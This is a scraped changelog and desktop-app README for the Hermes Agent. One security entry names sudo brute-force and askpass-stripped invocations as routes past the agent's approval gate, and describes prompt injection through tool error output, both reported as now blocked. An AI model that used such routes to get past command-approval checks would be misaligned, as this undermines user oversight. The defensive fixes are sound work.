- **`huggingface/skills` as a trusted default tap** — The community skills index hosted at huggingface.co/skills is now wired into the Skills Hub by default. So when somebody publishes a useful skill there, you can install it from your own `hermes skills` browser without any extra config. (closes #2549) ([#26219](https://github.com/NousResearch/hermes-agent/pull/26219))
- **`hermes-skills/huggingface` as a trusted default tap** — community skills index from huggingface.co/skills is available by default in the Skills Hub. ([#26219](https://github.com/NousResearch/hermes-agent/pull/26219))
- **9 new optional skills** — Hyperliquid (perp + spot trading via the SDK and REST API), Yahoo Finance (live market data, fundamentals, historicals), api-testing (REST + GraphQL debug recipes), unified EVM multi-chain (one skill covers Ethereum + L2s + Base), darwinian-evolver (evolutionary prompt/skill tuning), osint-investigation (OSINT recipes for people / domains / orgs), pinggy-tunnel (expose local services to the public internet), watchers (polls RSS / HTTP JSON / GitHub via cron `no_agent` mode for change detection), and a full Notion overhaul for the May 2026 Developer Platform. ([#23582](https://github.com/NousResearch/hermes-agent/pull/23582), [#23583](https://github.com/NousResearch/hermes-agent/pull/23583), [#23590](https://github.com/NousResearch/hermes-agent/pull/23590), [#25299](https://github.com/NousResearch/hermes-agent/pull/25299), [#26760](https://github.com/NousResearch/hermes-agent/pull/26760), [#26729](https://github.com/NousResearch/hermes-agent/pull/26729), [#26765](https://github.com/NousResearch/hermes-agent/pull/26765), [#21881](https://github.com/NousResearch/hermes-agent/pull/21881), [#26612](https://github.com/NousResearch/hermes-agent/pull/26612))
- **API server exposes run approval events** — If you're driving Hermes programmatically through the HTTP API, long-running runs no longer silently hang when the agent hits an approval-required command. The approval request now surfaces on the API stream so your client can prompt the user and reply — no more silent stalls. (salvage of [#20311](https://github.com/NousResearch/hermes-agent/pull/20311)) ([#21899](https://github.com/NousResearch/hermes-agent/pull/21899))
- **API server exposes run approval events** — long-running runs surface approval requests over the API stream, no more silent stalls. (salvage of [#20311](https://github.com/NousResearch/hermes-agent/pull/20311)) ([#21899](https://github.com/NousResearch/hermes-agent/pull/21899))
- **Plugins can run any LLM call via `ctx.llm` + replace built-in tools via `tool_override`** — If you're writing a Hermes plugin, you now get first-class access to make LLM calls through the active provider and credentials — no manual client wiring. The new `tool_override` flag lets a plugin swap out a built-in tool with its own implementation cleanly. Plugin authors get the same model-routing and auth plumbing the core agent uses. (closes #11049) ([#23194](https://github.com/NousResearch/hermes-agent/pull/23194), [#26759](https://github.com/NousResearch/hermes-agent/pull/26759))
- **`/subgoal` — user-added criteria appended to active `/goal`** — layer extra success criteria onto a running goal loop. The judge sees them in the prompt, no behavior change when subgoals are empty. ([#25449](https://github.com/NousResearch/hermes-agent/pull/25449))
- **Brave Search (free tier) + DuckDuckGo (DDGS) as web-search providers** — Two new free web-search backends join Tavily, SearXNG, and Exa. Brave Search has a generous free tier; DDGS is the DuckDuckGo scraper that needs no key at all. Pick whichever fits your budget and rate-limit needs. ([#21337](https://github.com/NousResearch/hermes-agent/pull/21337))
- **Plugins can run any LLM call via `ctx.llm`** — plugins get a first-class hook to make their own LLM requests through the active provider/credentials, no manual wiring. Plus `tool_override` flag for replacing built-in tools. ([#23194](https://github.com/NousResearch/hermes-agent/pull/23194), [#26759](https://github.com/NousResearch/hermes-agent/pull/26759))
- **Sudo brute-force block + 3 dangerous-command bypasses closed + tool-error sanitization** — The approval gate now blocks `sudo -S` brute-force attempts and classifies stdin-fed or askpass-stripped sudo invocations as DANGEROUS. Three known bypasses of dangerous-command detection are closed (inspired by Claude Code's command-detection work). And tool error strings are now sanitized before being re-injected into the model context, so a malicious file or remote service can't pass instructions to your agent through error output. ([#23736](https://github.com/NousResearch/hermes-agent/pull/23736), [#26829](https://github.com/NousResearch/hermes-agent/pull/26829), [#26823](https://github.com/NousResearch/hermes-agent/pull/26823))
- **Brave Search (free tier) + DuckDuckGo (DDGS) as web-search providers** — two new free search backends alongside Tavily / SearXNG / Exa. ([#21337](https://github.com/NousResearch/hermes-agent/pull/21337))
- **`/subgoal` — user-added criteria appended to an active `/goal`** — When you've got a `/goal` running (the persistent Ralph-loop goal where the agent keeps going until criteria are met), you can now use `/subgoal <text>` to layer extra success criteria onto it mid-run. The judge factors your new criteria into the done-or-keep-going decision without restarting the loop. ([#25449](https://github.com/NousResearch/hermes-agent/pull/25449))
- **Sudo brute-force block + sudo-stdin/askpass DANGEROUS classification** — closes the `sudo -S`brute-force avenue; approval gates classify stdin-fed and askpass-stripped sudo invocations as dangerous. (salvages of #22194 + #21128) ([#23736](https://github.com/NousResearch/hermes-agent/pull/23736))
- **Provider rename — Alibaba Cloud → Qwen Cloud** — The Alibaba Cloud provider is renamed to Qwen Cloud in the picker and config to match what the rest of the world calls it. Existing config keys still work — no breaking changes — but the UI matches the actual brand now. ([#24835](https://github.com/NousResearch/hermes-agent/pull/24835))
- **Native Windows support (early beta)** — Hermes now runs natively on `cmd.exe` and PowerShell without WSL. A full PowerShell installer handles MinGit auto-install, Microsoft Store python stub detection, and the foreground Ctrl+C dance. There's still rough edges (this is the "early beta" stamp) — ~40 follow-up Windows-only fixes already landed in the window — but the basic loop works end-to-end on a clean Windows box. ([#21561](https://github.com/NousResearch/hermes-agent/pull/21561))
- **Provider rename — Alibaba Cloud → Qwen Cloud, picker reorder** — matches what the world calls it. Existing config keys still work. ([#24835](https://github.com/NousResearch/hermes-agent/pull/24835))
"description":"Capabilities required by Hermes Setup. Narrowly scoped: we don't write user files outside HERMES_HOME, we don't read arbitrary paths, and the only external network call goes through reqwest (Rust side, not exposed to the webview).",
**The native desktop app for [Hermes Agent](../../README.md) — the self-improving AI agent from [Nous Research](https://nousresearch.com).** Same agent, same skills, same memory as the CLI and gateway, in a polished native window — chat with streaming tool output, side-by-side previews, a file browser, voice, and settings, no terminal required. Available for **macOS, Windows, and Linux**.
<table>
<tr><td><b>Chat with the full agent</b></td><td>Streaming responses, live tool activity, structured tool summaries, and the same conversation history as every other Hermes surface.</td></tr>
<tr><td><b>Side-by-side previews</b></td><td>Render web pages, files, and tool outputs in a right-hand pane while you keep chatting.</td></tr>
<tr><td><b>File browser</b></td><td>Explore and preview the working directory without leaving the app.</td></tr>
<tr><td><b>Voice</b></td><td>Talk to Hermes and hear it back.</td></tr>
<tr><td><b>Settings & onboarding</b></td><td>Manage providers, models, tools, and credentials from a real UI. First-run setup gets you to your first message in seconds.</td></tr>
<tr><td><b>Stays current</b></td><td>Built-in updates pull the latest agent and rebuild the app in place.</td></tr>
</table>
---
## Install
### Install with Hermes (recommended)
Add `--include-desktop` to the [one-line installer](../../README.md#quick-install) and it sets up the agent and builds the desktop app in one go:
It builds and launches the GUI against your existing install — same config, keys, sessions, and skills. On first launch Hermes walks you through picking a provider and model; nothing else to configure.
### Prebuilt installers
When a release ships desktop installers they're attached to its [releases page](https://github.com/NousResearch/hermes-agent/releases) — `.dmg` (macOS), `.exe` / `.msi` (Windows), `.AppImage` / `.deb` / `.rpm` (Linux). These are published manually, so the install-with-Hermes path above is the most reliable way to get the latest.
---
## Updating
The app checks for updates in the background and offers a one-click update when one is ready. You can also update any time from the CLI:
```bash
hermes update
```
---
## Requirements
The installer handles everything for you (Python 3.11+, a portable Git, ripgrep). The only thing worth knowing:
- **Windows** — the installer bundles its own Git and Python; no admin rights or system changes required.
- **macOS / Linux** — uses your system Python 3.11+ (installed automatically if missing).
---
## Development
Want to hack on the app itself? Install workspace deps from the repo root once, then run the dev server from this directory:
npm run dev # Vite renderer + Electron, which boots the Python backend
```
Point the app at a specific source checkout, or sandbox it away from your real config:
```bash
HERMES_DESKTOP_HERMES_ROOT=/path/to/clone npm run dev
HERMES_HOME=/tmp/throwaway npm run dev
npm run dev:fake-boot # exercise the startup overlay with deterministic delays
```
### Building installers
```bash
npm run dist:mac # DMG + zip
npm run dist:win # NSIS + MSI
npm run dist:linux # AppImage + deb + rpm
npm run pack # unpacked app under release/ (no installer)
```
Installers are built and uploaded to GitHub Releases manually. macOS/Windows signing & notarization happen automatically when the relevant credentials are present in the environment (`CSC_LINK` / `CSC_KEY_PASSWORD` / `APPLE_*` for macOS, `WIN_CSC_*` for Windows).
### How it works
The packaged app ships only the Electron shell. On first launch it installs the Hermes Agent runtime into `HERMES_HOME` (`~/.hermes`, or `%LOCALAPPDATA%\hermes` on Windows) — the **same layout a CLI install uses**, so the two are interchangeable. The renderer (React, in `src/`) talks to a `hermes dashboard --tui` backend over the standard gateway APIs and reuses the embedded TUI rather than reimplementing chat. The install, backend-resolution, and self-update logic all live in `electron/main.cjs`.
### Verification
Run before opening a PR (lint may surface pre-existing warnings but must exit cleanly):
```bash
npm run fix
npm run type-check
npm run lint
npm run test:desktop:all
```
### Troubleshooting
Boot logs land in `HERMES_HOME/logs/desktop.log` (includes backend output and recent Python tracebacks) — check it first if the app reports a boot failure.
Some files were not shown because too many files have changed in this diff
Show More
Reference in New Issue
Block a user
Blocking a user prevents them from interacting with repositories, such as opening or commenting on pull requests or issues. Learn more about blocking a user.